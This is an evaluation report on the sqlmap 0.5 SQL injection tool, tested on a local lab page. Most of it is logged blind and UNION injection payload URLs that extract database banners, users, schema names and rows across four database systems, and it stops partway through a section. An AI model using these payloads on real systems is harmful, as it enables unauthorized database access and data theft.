Tool Information

License

    GPL v2

Version

    0.5

Author & Contact Information

    Bernardo Damele (Project Leader), bernardo.damele at gmail dot com and
    Daniele Bellucci, daniele.bellucci at gmail dot com

Programming Language

    Python

Prerequisites

    -

URL

    http://sqlmap.sourceforge.net/#download

Test Bed

    win2k3 sp1 vmware image with Python 2.5
    MSSQL 2005 EE, Oracle 10g EE, DB2 EC v 9.5, PostGreSQL 8.2, MySQL Community 5.0.45

Installation Tips (Bugs/Fixes/Suggestions)

    1 bug fix; see "Sqlmap v.0.5 - HÇÖ" (Bugs/Fixes/Suggestions) for details

About the Report

Report Name

    Sqlmap - Automated SQL Injector Analysis

Report Author

    Bedirhan Urgun, urgunb at hotmail dot com

Report Date

    28 February 2008

Usage

Command Line/Graphical Interface

    Command line

Start/Stop/Resume Features

    The attack process can be killed, but if the logging option (-o) was used, the attack can later be resumed from where it stopped (-r option).

Example:

[09:39:01] [INFO] query: DATABASE()
[09:39:01] [INFO] retrieved the length of query output: 6
[09:39:03] [INFO] resumed from file 'sqlmap.log': s...
[09:39:03] [INFO] retrieving pending 5 query output characters
[09:39:03] [INFO] retrieved: akila
current database:    'sakila'

 

Documentation

    A very useful README.html file under the "doc" directory

DB Dump Capabilities

Lightweight Information

    DBMS banner, current user, current database, database users, database user password hashes (other information can be retrieved with the -e "[query_here]" option)

Database Names

    with the --dbs option

Table Names

    with the --tables option

Column Names

    with the --columns option

Table Rows

    with the --dump option

Performance

Basic Query

    sqlmap.py -u http://localhost/sqlinj.php --method POST --data "name=PENELOPE&blind=false&order=1&database=mysql" --banner

    DBMS banner dump

Tips

    To use fewer requests (for both the blind and the union SQL injection types), the following options can be used:

--remote-dbms=DBMS  (ex: --remote-dbms="mysql 5")
-p PARAMNAME  (ex: -p name)
--exclude-sysdbs

 

Total Number of Queries Executed

    Getting the DBMS banner

                      Blind    Union
        Mysql           151       17
        Mssql          1331       18
        Postgresql      630       18
        Oracle          465       18

    Getting the user name

                      Blind    Union
        Mysql            31       18
        Mssql            78       17
        Postgresql       70       18
        Oracle           74       18

Features

Authentication Types

    Cookie

        with the --cookie option

    Basic Authentication

        with the --basic-auth option

    Digest Authentication

        with the --digest-auth option

    NTLM

        -

    Certificate

        -

DBMS Support

    Database names shown in bold were tested successfully for this report.

    MSSQL
    MYSQL
    POSTGRESQL
    ORACLE

Implemented Injection Types

    Blind

        True/False

            Yes

        Time-Based

            -

    Error-Based

        -

    Union

        Yes, with the --use-union option

    Single-Record Union

        Yes

    Out-of-Band Channel

        -

Anonymity Support

    User-Agent

        with the --user-agent option

    Referrer

        -

    Proxy

        with the --proxy option

Database Dump Granularity

    databases, tables, columns, rows

Other

    302 Redirect Handling

        -

    Evasion Features

        string encoding (ASCII->Char)

    Custom SQL Query Support

        with the -e option

    Parallel Requests

        -. The algorithm used does, however, lend itself to parallel execution.

Injection Points

    GET

        Yes

    POST

        Yes

    COOKIE

        Yes

    HTTP HEADERS

        -

Automatic Software Update

    SVN

Output/Logging

Request/Response Logs

    with the -v debug level option

Program-Specific Logging

    with the -o option

SQLi Vulnerability Scanning Support

Basic SQL Injection Test (Single URL and Parameters)

    Yes

Basic SQL Injection Scanning (via Crawling)

    -

Query Details

    Blind

    Getting the DBMS banner

        Mysql

...

http://localhost/sqlinj.php?name=PENELOPE' AND ORD(MID((VERSION()), 7, 1)) > 31 AND '1'='1&database=&type=&order=&log=1

...

 

        Mssql 

 

...

 http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((@@VERSION), 3, 1)) > 63 AND '1'='1&database=mssql&type=0&order=1&log=1

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((VERSION()), 2, 1)) > 111 AND '1'='1&database=pgsql&type=0&order=1&log=1 

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT banner FROM v$version WHERE ROWNUM=1), 2, 1)) > 119 AND '1'='1&database=oracle&type=0&order=1&log=1 

... 

    Getting the user name

        Mysql

 

...

 http://localhost/sqlinj.php?name=PENELOPE' AND ORD(MID((CURRENT_USER()), 3, 1)) > 105 AND '1'='1&database=mysql&type=0&order=1&log=1

...

 

        Mssql 

 

...

 http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((SYSTEM_USER), 1, 1)) > 107 AND '1'='1&database=mssql&type=0&order=1&log=1

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((CURRENT_USER), 2, 1)) > 63 AND '1'='1&database=pgsql&type=0&order=1&log=1 

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT SYS.LOGIN_USER FROM DUAL), 1, 1)) > 75 AND '1'='1&database=oracle&type=0&order=1&log=1 

...

 

    Getting database names

        Mysql

 

...

 http://localhost/sqlinj.php?name=PENELOPE' AND ORD(MID((SELECT schema_name FROM information_schema.SCHEMATA LIMIT 0, 1), 8, 1)) > 63 AND '1'='1&database=mysql&type=0&order=1&log=1

...

 

        Mssql 

 

...

 http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases), 2, 1)) > 7 AND '1'='1&database=mssql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((SELECT TOP 1 name FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM master..sysdatabases ORDER BY name) ORDER BY name), 5, 1)) > 111 AND '1'='1&database=mssql&type=0&order=1&log=1

...

        Postgresql

 

...

 http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT COUNT(DISTINCT(schemaname)) FROM pg_tables), 2, 1)) > 63 AND '1'='1&database=pgsql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT DISTINCT(schemaname) FROM pg_tables OFFSET 0 LIMIT 1), 2, 1)) > 107 AND '1'='1&database=pgsql&type=0&order=1&log=1

...

        Oracle 

 

        - ("[WARNING] this plugin can not enumerate databases")

 

    Getting table names

        Mysql

 

...

 http://localhost/sqlinj.php?name=PENELOPE' AND ORD(MID((SELECT COUNT(table_name) FROM information_schema.TABLES WHERE table_schema=CHAR(115,97,107,105,108,97)), 3, 1)) > 15 AND '1'='1&database=mysql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ORD(MID((SELECT table_name FROM information_schema.TABLES WHERE table_schema=CHAR(115,97,107,105,108,97) LIMIT 0, 1), 1, 1)) > 103 AND '1'='1&database=mysql&type=0&order=1&log=1
...

 

        Mssql 

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((SELECT LTRIM(STR(COUNT(table_name))) FROM Northwind.information_schema.tables WHERE table_type=(CHAR(66) CHAR(65) CHAR(83) CHAR(69) CHAR(32) CHAR(84) CHAR(65) CHAR(66) CHAR(76) CHAR(69))), 3, 1)) > 31 AND '1'='1&database=mssql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((SELECT TOP 1 table_name FROM Northwind.information_schema.tables WHERE table_type=(CHAR(66) CHAR(65) CHAR(83) CHAR(69) CHAR(32) CHAR(84) CHAR(65) CHAR(66) CHAR(76) CHAR(69)) AND table_name NOT IN (SELECT TOP 0 table_name FROM Northwind.information_schema.tables WHERE table_type=(CHAR(66) CHAR(65) CHAR(83) CHAR(69) CHAR(32) CHAR(84) CHAR(65) CHAR(66) CHAR(76) CHAR(69)) ORDER BY table_name) ORDER BY table_name), 3, 1)) > 63 AND '1'='1&database=mssql&type=0&order=1&log=1 

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT COUNT(tablename) FROM pg_tables WHERE schemaname=(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))), 2, 1)) > 51 AND '1'='1&database=pgsql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT tablename FROM pg_tables WHERE schemaname=(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)) OFFSET 0 LIMIT 1), 2, 1)) > 63 AND '1'='1&database=pgsql&type=0&order=1&log=1

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))), 2, 1)) > 7 AND '1'='1&database=oracle&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS limit FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))) WHERE limit=1), 3, 1)) > 95 AND '1'='1&database=oracle&type=0&order=1&log=1

...

 

    Getting column names

        Mysql

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ORD(MID((SELECT COUNT(column_name) FROM information_schema.COLUMNS WHERE table_name=CHAR(97,99,116,111,114) AND table_schema=CHAR(115,97,107,105,108,97)), 1, 1)) > 52 AND '1'='1&database=mysql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ORD(MID((SELECT column_name FROM information_schema.COLUMNS WHERE table_name=CHAR(97,99,116,111,114) AND table_schema=CHAR(115,97,107,105,108,97) LIMIT 0, 1), 1, 1)) > 99 AND '1'='1&database=mysql&type=0&order=1&log=1 

...

 

        Mssql 

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((SELECT LTRIM(STR(COUNT(column_name))) FROM Northwind.information_schema.columns, Northwind.information_schema.tables WHERE Northwind.information_schema.columns.table_name=(CHAR(97) CHAR(99) CHAR(116) CHAR(111) CHAR(114)) AND Northwind.information_schema.columns.table_name=Northwind.information_schema.tables.table_name AND Northwind.information_schema.tables.table_type=(CHAR(66) CHAR(65) CHAR(83) CHAR(69) CHAR(32) CHAR(84) CHAR(65) CHAR(66) CHAR(76) CHAR(69))), 2, 1)) > 7 AND '1'='1&database=mssql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((SELECT TOP 1 column_name FROM Northwind.information_schema.columns, Northwind.information_schema.tables WHERE Northwind.information_schema.columns.table_name=(CHAR(97) CHAR(99) CHAR(116) CHAR(111) CHAR(114)) AND Northwind.information_schema.columns.table_name=Northwind.information_schema.tables.table_name AND Northwind.information_schema.tables.table_type=(CHAR(66) CHAR(65) CHAR(83) CHAR(69) CHAR(32) CHAR(84) CHAR(65) CHAR(66) CHAR(76) CHAR(69)) AND column_name NOT IN (SELECT TOP 0 column_name FROM Northwind.information_schema.columns, Northwind.information_schema.tables WHERE Northwind.information_schema.columns.table_name=(CHAR(97) CHAR(99) CHAR(116) CHAR(111) CHAR(114)) AND Northwind.information_schema.columns.table_name=Northwind.information_schema.tables.table_name AND Northwind.information_schema.tables.table_type=(CHAR(66) CHAR(65) CHAR(83) CHAR(69) CHAR(32) CHAR(84) CHAR(65) CHAR(66) CHAR(76) CHAR(69)) ORDER BY column_name) ORDER BY column_name), 1, 1)) > 95 AND '1'='1&database=mssql&type=0&order=1&log=1 

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT COUNT(attname) FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname=(CHR(97)||CHR(99)||CHR(116)||CHR(111)||CHR(114)) AND nspname=(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))), 2, 1)) > 15 AND '1'='1&database=pgsql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT attname FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname=(CHR(97)||CHR(99)||CHR(116)||CHR(111)||CHR(114)) AND nspname=(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)) OFFSET 0 LIMIT 1), 3, 1)) > 116 AND '1'='1&database=pgsql&type=0&order=1&log=1 

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(65)||CHR(67)||CHR(84)||CHR(79)||CHR(82))), 2, 1)) > 3 AND '1'='1&database=oracle&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT COLUMN_NAME FROM (SELECT COLUMN_NAME, ROWNUM AS limit FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(65)||CHR(67)||CHR(84)||CHR(79)||CHR(82))) WHERE limit=1), 3, 1)) > 63 AND '1'='1&database=oracle&type=0&order=1&log=1

...

 

    Getting rows

        Mysql

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ORD(MID((SELECT COUNT(*) FROM sakila.actor), 3, 1)) > 55 AND '1'='1&database=mysql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ORD(MID((SELECT actor_id FROM sakila.actor ORDER BY actor_id LIMIT 3, 1), 2, 1)) > 63 AND '1'='1&database=mysql&type=0&order=1&log=1 

...

 

        Mssql 

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((SELECT LTRIM(STR(COUNT(*))) FROM Northwind..actor), 3, 1)) > 48 AND '1'='1&database=mssql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((SELECT TOP 1 actor_id FROM Northwind..actor WHERE actor_id NOT IN (SELECT TOP 2 actor_id FROM Northwind..actor ORDER BY actor_id) ORDER BY actor_id), 1, 1)) > 1 AND '1'='1&database=mssql&type=0&order=1&log=1

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT COUNT(*) FROM public.actor), 4, 1)) > 31 AND '1'='1&database=pgsql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT actor_id FROM public.actor ORDER BY actor_id OFFSET 1 LIMIT 1), 1, 1)) > 50 AND '1'='1&database=pgsql&type=0&order=1&log=1 

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT COUNT(*) FROM ACTOR), 4, 1)) > 7 AND '1'='1&database=oracle&type=0&order=1&log=1

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT ACTOR_ID FROM (SELECT ACTOR_ID, ROWNUM AS limit FROM ACTOR ORDER BY ACTOR_ID) WHERE limit=2), 1, 1)) > 63 AND '1'='1&database=oracle&type=0&order=1&log=1 

...

    Union

    Getting the DBMS banner

        Mysql

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), CHAR(49,55,55,48,51), CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(), CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1 

...

 

        Mssql 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(65) CHAR(82) CHAR(84) CHAR(95) CHAR(95)) @@VERSION (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(79) CHAR(80) CHAR(95) CHAR(95)), NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1 

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||VERSION()||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1 

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CAST(banner AS varchar(4000))||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL FROM v$version WHERE ROWNUM=1-- ('1'='1&database=oracle&type=2&order=1&log=1 

... 

 

    Getting the user name

        Mysql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), CURRENT_USER(), CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
...

 

        Mssql 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(65) CHAR(82) CHAR(84) CHAR(95) CHAR(95)) SYSTEM_USER (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(79) CHAR(80) CHAR(95) CHAR(95)), NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1 

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CURRENT_USER||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1     

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CAST(SYS.LOGIN_USER AS varchar(4000))||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1 

...

 

    Getting database names

        Mysql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), schema_name, CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL FROM information_schema.SCHEMATA-- ('1'='1&database=mysql&type=2&order=1&log=1

...

 

        Mssql 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(65) CHAR(82) CHAR(84) CHAR(95) CHAR(95)) CAST(name AS varchar) (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(79) CHAR(80) CHAR(95) CHAR(95)), NULL, NULL FROM master..sysdatabases-- ('1'='1&database=mssql&type=2&order=1&log=1 

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CAST(schemaname AS bpchar)||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL FROM pg_tables-- ('1'='1&database=pgsql&type=2&order=1&log=1 

...

        Oracle 

 

        - ("[WARNING] this plugin can not enumerate databases")

 

    Getting table names

        Mysql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), table_schema, CHAR(95,95,68,69,76,95,95), table_name, CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL FROM information_schema.TABLES WHERE table_schema=CHAR(115,97,107,105,108,97)-- ('1'='1&database=mysql&type=2&order=1&log=1

...

 

        Mssql 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(65) CHAR(82) CHAR(84) CHAR(95) CHAR(95)) CAST(table_name AS varchar) (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(79) CHAR(80) CHAR(95) CHAR(95)), NULL, NULL FROM Northwind.information_schema.tables WHERE table_type=(CHAR(66) CHAR(65) CHAR(83) CHAR(69) CHAR(32) CHAR(84) CHAR(65) CHAR(66) CHAR(76) CHAR(69))-- ('1'='1&database=mssql&type=2&order=1&log=1 

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CAST(schemaname AS bpchar)||(CHR(95)||CHR(95)||CHR(68)||CHR(69)||CHR(76)||CHR(95)||CHR(95))|| CAST(tablename AS bpchar)||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL FROM pg_tables WHERE schemaname=(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))-- ('1'='1&database=pgsql&type=2&order=1&log=1 

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CAST(TABLESPACE_NAME AS varchar(4000))||(CHR(95)||CHR(95)||CHR(68)||CHR(69)||CHR(76)||CHR(95)||CHR(95))|| CAST(TABLE_NAME AS varchar(4000))||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))-- ('1'='1&database=oracle&type=2&order=1&log=1 

...

 

    Getting column names

        Mysql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), column_name, CHAR(95,95,68,69,76,95,95), data_type, CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL FROM information_schema.COLUMNS WHERE table_name=CHAR(97,99,116,111,114) AND table_schema=CHAR(115,97,107,105,108,97)-- ('1'='1&database=mysql&type=2&order=1&log=1 

...

 

        Mssql 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(65) CHAR(82) CHAR(84) CHAR(95) CHAR(95)) CAST(column_name AS varchar) (CHAR(95) CHAR(95) CHAR(68) CHAR(69) CHAR(76) CHAR(95) CHAR(95))  CAST(data_type AS varchar) (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(79) CHAR(80) CHAR(95) CHAR(95)), NULL, NULL FROM Northwind.information_schema.columns, Northwind.information_schema.tables WHERE Northwind.information_schema.columns.table_name=(CHAR(97) CHAR(99) CHAR(116) CHAR(111) CHAR(114)) AND Northwind.information_schema.columns.table_name=Northwind.information_schema.tables.table_name AND Northwind.information_schema.tables.table_type=(CHAR(66) CHAR(65) CHAR(83) CHAR(69) CHAR(32) CHAR(84) CHAR(65) CHAR(66) CHAR(76) CHAR(69))-- ('1'='1&database=mssql&type=2&order=1&log=1 

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
...

